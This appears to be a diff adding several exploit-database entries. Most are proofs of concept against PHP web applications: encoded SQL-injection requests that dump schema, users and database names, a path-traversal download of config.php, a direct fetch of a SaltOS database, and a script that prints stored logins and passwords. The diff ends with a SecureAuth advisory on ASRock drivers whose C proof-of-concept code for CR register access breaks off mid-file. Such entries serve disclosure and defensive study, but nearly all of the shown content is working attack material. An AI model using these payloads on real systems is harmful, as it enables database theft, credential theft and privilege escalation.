GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 19:58:47 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 3)
|
||||
# http://localhost/[PATH]/admin/login.php
|
||||
#
|
||||
#[PATH]/admin/login.php
|
||||
#...
|
||||
#58 if (isset($_POST['btnlogin'])) {
|
||||
#59 //form has been submitted1
|
||||
#60
|
||||
#61 $uname = trim($_POST['email']);
|
||||
#62 $upass = trim($_POST['pass']);
|
||||
#...
|
62
exploits/php/webapps/45729.txt
Normal file
62
exploits/php/webapps/45729.txt
Normal file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: RhinOS CMS 3.x - Arbitrary File Download
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: http://www.saltos.org/
|
||||
# Software Link: https://netix.dl.sourceforge.net/project/rhinos/archived/r1190/RhinOS-en-3.0-1190.win32.exe
|
||||
# Version: 3.1 r0 / 3.x
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18760
|
||||
|
||||
# Users...
|
||||
# C:/rhinos/demo/admin/php/download.php
|
||||
#....
|
||||
#26 $head=0;$main=0;$tail=0;
|
||||
#27 include("inicio.php");
|
||||
#28 if(!check_user()) die();
|
||||
#29 $name=getParam("name");
|
||||
#30 $file="files/".getParam("file");
|
||||
#31 $size=getParam("size");
|
||||
#32 $type=getParam("type");
|
||||
#33 if(!file_exists($file)) die();
|
||||
#34 header("Pragma: public");
|
||||
#35 header("Expires: 0");
|
||||
#36 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
|
||||
#37 header("Content-Type: $type");
|
||||
#38 header("Content-Length: $size");
|
||||
#39 header("Content-Disposition: attachment; filename=\"$name\"");
|
||||
#40 header("Content-Transfer-Encoding: binary");
|
||||
#41 $fp=fopen($file,"rb");
|
||||
#42 while(!feof($fp)) echo fread($fp,8192);
|
||||
#43 fclose($fp);
|
||||
#44 disconnect();
|
||||
#....
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php
|
||||
#
|
||||
GET /[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: remember=0; PHPSESSID=ek24koab445aab70seegi02lh3
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:23:54 GMT
|
||||
Server: Apache/2.2.16 (Win32) PHP/5.3.3
|
||||
X-Powered-By: PHP/5.3.3
|
||||
Expires: 0
|
||||
Cache-Control: must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: public
|
||||
Content-Length: 1771
|
||||
Content-Disposition: attachment; filename="efe.php"
|
||||
Content-Transfer-Encoding: binary
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type:
|
39
exploits/php/webapps/45730.txt
Normal file
39
exploits/php/webapps/45730.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: E-Negosyo System 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bsenordering_9-23-18.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18801
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
|
||||
#
|
||||
GET /[PATH]/index.php?q=product&category=Cakes%27%20%20UNION%20SELECT%201,2,3,4,5,6,7,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),9,10,11,12,13,14,15,16,17,18,19,20--%20- HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 20:24:30 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/index.php?q=single-item&id=[SQL]
|
||||
# ....
|
50
exploits/php/webapps/45731.txt
Normal file
50
exploits/php/webapps/45731.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: http://www.saltos.org/
|
||||
# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32
|
||||
# Version: 3.1 r0 / 3.x
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18761
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/index.php
|
||||
#
|
||||
POST /index.php HTTP/1.1
|
||||
Host: http://localhost/[PATH]:57187
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: */*
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: http://localhost/[PATH]:57187/index.php
|
||||
Content-Length: 1318
|
||||
Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; lang=en_US; __lang__=1543313377; style=blue; __style__=1543313377; iconset=silk; __iconset__=1543313377
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
action=login&querystring=&user=%2531%2527%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%2575%256e%2574%2528%252a%2529%252c%2563%256f%256e%2563%2561%2574%2528%2528%2573%2565%256c%2565%2563%2574%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%2528%2563%2561%2573%2574%2528%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%2561%2573%2520%2563%2568%2561%2572%2529%252c%2530%2578%2537%2565%2529%2529%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2577%2568%2565%2572%2565%2520%2574%2561%2562%256c%2565%255f%2573%2563%2568%2565%256d%2561%253d%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%256c%2569%256d%2569%2574%2520%2530%252c%2531%2529%252c%2566%256c%256f%256f%2572%2528%2572%2561%256e%2564%2528%2530%2529%252a%2532%2529%2529%2578%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2567%2572%256f%2575%2570%2520%2562%2579%2520%2578%2529%2561%2529%2520%2541%254e%2544%2520%2527%2545%2566%2565%2527%253d%2527%2545%2566%2565&pass=x&lang=en_US&style=blue&iconset=silk
|
||||
HTTP/1.1 200 OK
|
||||
Host: localhost/[PATH]:57187
|
||||
Connection: close
|
||||
X-Powered-By: PHP/5.4.15
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Set-Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; path=\
|
||||
Set-Cookie: user=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
|
||||
Set-Cookie: __user__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
|
||||
Set-Cookie: pass=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
|
||||
Set-Cookie: __pass__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
|
||||
Set-Cookie: remember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
|
||||
Set-Cookie: __remember__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
|
||||
Set-Cookie: lang=en_US; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
|
||||
Set-Cookie: __lang__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
|
||||
Set-Cookie: style=blue; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
|
||||
Set-Cookie: __style__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
|
||||
Set-Cookie: iconset=silk; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
|
||||
Set-Cookie: __iconset__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
|
||||
Content-Type: text/html;charset=UTF-8
|
39
exploits/php/webapps/45733.txt
Normal file
39
exploits/php/webapps/45733.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: http://www.saltos.org/
|
||||
# Software Link: https://excellmedia.dl.sourceforge.net/project/saltos/stable/SaltOS-3.1-8126.linux-i686.tgz
|
||||
# Version: 3.1 r0 / 3.x
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18763
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/index.php
|
||||
#
|
||||
POST /[PATH]/index.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 747
|
||||
Cookie: PHPSESSID=il9r6344ch0ned04kg1hpc7l45; lang=en_US; __lang__=1543322831; style=blue; __style__=1543322831; iconset=silk; __iconset__=1543322831
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
action=ajax&query=numbers&page=usuarios&action2=list%27%29%20%61%6e%44%20%28%53%45%4c%65%63%74%20%31%35%35%20%46%72%6f%4d%28%53%45%4c%45%43%54%20%43%4f%75%6e%74%28%2a%29%2c%43%4f%6e%63%61%54%28%63%6f%6e%43%41%54%28%30%78%32%30%33%61%32%30%2c%55%73%65%52%28%29%2c%44%61%74%41%42%41%53%45%28%29%2c%56%45%72%53%49%6f%4e%28%29%29%2c%30%78%37%65%2c%28%73%65%6c%65%43%54%20%28%65%6c%54%28%31%35%35%3d%31%35%35%2c%31%29%29%29%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%66%6c%6f%4f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%66%72%4f%4d%20%49%4e%46%6f%72%6d%41%54%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%4c%75%67%49%4e%53%20%47%72%6f%55%50%20%42%59%20%78%29%61%29%20%41%6e%64%20%28%27%45%66%65%27%3d%27%45%66%65&id=0: undefined
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:12:53 GMT
|
||||
Server: Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16
|
||||
X-Powered-By: SaltOS v3.1 r8126
|
||||
Expires: -1
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Vary: Accept-Encoding
|
||||
Connection: keep-alive, close
|
||||
Content-Type: text/html;charset=UTF-8
|
||||
Transfer-Encoding: chunked
|
47
exploits/php/webapps/45734.txt
Normal file
47
exploits/php/webapps/45734.txt
Normal file
|
@ -0,0 +1,47 @@
|
|||
# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - Database File Download
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: http://www.saltos.org/
|
||||
# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32
|
||||
# Version: 3.1 r0 / 3.x
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18762
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/files/saltos.db
|
||||
#
|
||||
# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2853 [200]: /index.php?action=logout
|
||||
# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2856 [200]: /
|
||||
# [Mon Oct 29 00:05:51 2018] 127.0.0.1:2857 [200]: /files/saltos.db
|
||||
#
|
||||
GET /files/saltos.db HTTP/1.1
|
||||
Host: localhost:57187
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=a06furpg1gf54hqf573l886qs3; lang=es_ES; __lang__=1543317075; style=blue; __style__=1543317075; iconset=silk; __iconset__=1543317075
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
HTTP/1.1 200 OK
|
||||
Host: localhost:57187
|
||||
Connection: close
|
||||
Content-Type: application/octet-stream
|
||||
Content-Length: 8462336
|
||||
|
||||
<?php
|
||||
|
||||
$baglan = new SQLite3('saltos.db');
|
||||
|
||||
$sonuc = $baglan->query('SELECT * FROM tbl_usuarios');
|
||||
|
||||
while ($p = $sonuc->fetchArray()) {?>
|
||||
|
||||
<h4><?php echo $p['login'];?></h4>
|
||||
<h4><?php echo $p['password'];?></h4>
|
||||
|
||||
<?php } ?>
|
59
exploits/php/webapps/45735.txt
Normal file
59
exploits/php/webapps/45735.txt
Normal file
|
@ -0,0 +1,59 @@
|
|||
# Exploit Title: K-iwi Framework 1775 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: http://www.k-iwi.com/
|
||||
# Software Link: https://sourceforge.net/projects/k-iwi/files/latest/download
|
||||
# Version: 1775
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18755
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/index.php?route=admin/user/group/update&token=&user_group_id=[SQL]
|
||||
#
|
||||
GET /[PATH]/index.php?route=admin/user/group/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_group_id=1%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:45:01 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Set-Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; path=/
|
||||
Set-Cookie: language=it_IT; expires=Sun, 25-Nov-2018 17:56:01 GMT; Max-Age=2592000; path=/; domain=192.168.1.27
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 1105
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/index.php?route=admin/user/user/update&token=&user_id=[SQL]
|
||||
#
|
||||
GET /[PATH]/index.php?route=admin/user/user/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_id=11%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; language=it_IT
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 01:52:50 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 1105
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
503
exploits/windows/dos/45716.txt
Normal file
503
exploits/windows/dos/45716.txt
Normal file
|
@ -0,0 +1,503 @@
|
|||
SecureAuth - SecureAuth Labs Advisory
|
||||
http://www.secureauth.com/
|
||||
|
||||
ASRock Drivers Elevation of Privilege Vulnerabilities
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: ASRock Drivers Elevation of Privilege Vulnerabilities
|
||||
Advisory ID: CORE-2018-0005
|
||||
Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
|
||||
Date published: 2018-10-25
|
||||
Date of last update: 2018-10-25
|
||||
Vendors contacted: ASRock
|
||||
Release mode: Coordinated release
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
|
||||
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
|
||||
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
|
||||
Access Control [CWE-782]
|
||||
Impact: Code execution
|
||||
Remotely Exploitable: No
|
||||
Locally Exploitable: Yes
|
||||
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
ASRock's website states that [1]:
|
||||
|
||||
ASRock Inc. is established in 2002, specialized in the field of
|
||||
motherboards. With the 3C design concept, Creativity, Consideration,
|
||||
Cost-effectiveness, the company explores the limit of motherboards
|
||||
manufacturing while paying attention on the eco issue at the same
|
||||
time, developing products with the consideration of eco-friendly
|
||||
concept. ASRock has been growing fast and become world third largest
|
||||
motherboard brand with headquarter in Taipei, Taiwan and branches in
|
||||
Europe and the USA.
|
||||
|
||||
ASRock offers several utilities designed to give the user with an ASRock
|
||||
motherboard more control over certain settings and functions.
|
||||
These utilities include various features like the RGB LED control,
|
||||
hardware monitor, fan controls, and overclocking/voltage options.
|
||||
|
||||
Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
|
||||
low level drivers, installed by ASRock RGBLED and other ASRock branded
|
||||
utilities, which could allow a local attacker to elevate privileges.
|
||||
|
||||
4. *Vulnerable Packages*
|
||||
|
||||
. ASRock RGBLED before v1.0.35.1
|
||||
. A-Tuning before v3.0.210
|
||||
. F-Stream before v3.0.210
|
||||
. RestartToUEFI before v1.0.6.2
|
||||
|
||||
5. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
ASRock published the following fixed applications for each of its
|
||||
motherboards models:
|
||||
|
||||
. ASRock RGBLED v1.0.36
|
||||
. A-Tuning v3.0.216
|
||||
. F-Stream v3.0.216
|
||||
. RestartToUEFI v1.0.7
|
||||
|
||||
Downloads are available on the ASRock website.
|
||||
|
||||
6. *Credits*
|
||||
|
||||
These vulnerabilities were discovered and researched by Diego Juarez.
|
||||
The publication of this advisory was coordinated by Leandro Cuozzo
|
||||
from SecureAuth Advisories Team.
|
||||
|
||||
7. *Technical Description / Proof of Concept Code*
|
||||
|
||||
ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
|
||||
use a low level driver to program and query the status on embedded ICs
|
||||
on their hardware. Fan curves, clock frequencies, LED colors, thermal
|
||||
performance, and other user customizable properties and monitoring
|
||||
functionality are exposed to applications through this low level kernel
|
||||
driver.
|
||||
|
||||
The main subjects of this advisory are the device drivers
|
||||
installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys).
|
||||
>From now on addressed as "AsrDrv". Default installation allows
|
||||
non-privileged user processes (even running at LOW INTEGRITY) to get a
|
||||
HANDLE and issue IOCTL codes to the driver.
|
||||
|
||||
The following sections describe the problems found.
|
||||
|
||||
7.1. *CR register access*
|
||||
|
||||
[CVE-2018-10709]
|
||||
|
||||
AsrDrv exposes functionality to read and write CR register values. This
|
||||
could be leveraged in a number of ways to ultimately run code with
|
||||
elevated privileges.
|
||||
|
||||
/-----
|
||||
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define IOCTL_ASROCK_READCR 0x22286C
|
||||
#define IOCTL_ASROCK_WRITECR 0x222870
|
||||
|
||||
HANDLE ghDriver = 0;
|
||||
|
||||
#pragma pack (push,1)
|
||||
|
||||
typedef struct _ASROCK_CR_STRUCT {
|
||||
ULONG64 reg;
|
||||
ULONG64 value;
|
||||
} ASROCK_CR_STRUCT;
|
||||
|
||||
#pragma pack(pop)
|
||||
|
||||
#define IOCTLMACRO(iocontrolcode, size) \
|
||||
ULONG64 outbuffer[2] = { 0 }; \
|
||||
DWORD returned = 0; \
|
||||
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
|
||||
return outbuffer[1]; \
|
||||
|
||||
ULONG64 ASROCK_ReadCR(DWORD reg)
|
||||
{
|
||||
ASROCK_CR_STRUCT inbuffer = { 3, 0};
|
||||
IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
|
||||
}
|
||||
|
||||
ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
|
||||
{
|
||||
ASROCK_CR_STRUCT inbuffer = { reg, value};
|
||||
IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
|
||||
}
|
||||
|
||||
BOOL InitDriver()
|
||||
{
|
||||
char szDeviceName[] = "\\\\.\\AsrDrv101";
|
||||
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
|
||||
if (ghDriver == INVALID_HANDLE_VALUE) {
|
||||
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
int main(int argc, char* argv[])
|
||||
{
|
||||
printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");
|
||||
|
||||
if (!InitDriver()) {
|
||||
printf("InitDriver failed! - aborting...\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
ULONG64 a = ASROCK_ReadCR(3);
|
||||
